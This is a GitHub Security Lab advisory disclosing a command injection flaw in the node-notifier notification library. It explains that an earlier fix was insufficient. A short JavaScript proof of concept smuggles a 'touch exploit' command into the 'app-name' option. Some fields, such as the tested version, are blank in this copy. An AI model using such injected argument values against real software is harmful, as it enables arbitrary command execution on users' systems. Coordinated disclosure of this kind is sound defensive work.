skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
April 13, 2021

GHSL-2020-373: Command injection in node-notifier

GitHub Security Lab

Coordinated Disclosure Timeline


node-notifier recently addressed a command injection vulnerability in, however this fix appears to be insufficient and command injection through malicious input is still possible.


Tested Version



node-notifier is a general purpose library for showing OS notifications (toasts). A client of the library expects that they can safely call the methods in node-notifier with user-controlled inputs. However, in some cases, that can lead to arbitrary command execution.

Issue 1: Insufficient input sanitization leads to command injection

Certain input fields of node-notifier are insufficiently sanitized and allow for command injection when passed as command line arguments.

The provided PoC pretends to be a client that sends malicious inputs to node-notifier.

The outcome of the PoC is that a file exploit is created in the current working directory.

var notifier = new Notify({ suppressOsdCheck: true }); var options = { title: “titl”, message: “msg”, “app-name”: [“footouch exploit”] //”category”: [“footouch exploit”] }; notifier.notify(options, () => {}); ```


Arbitrary command execution



This issue was discovered and reported by GitHub team member @erik-krogh.


You can contact the GHSL team at, please include GHSL-2020-373 in any communication regarding this issue.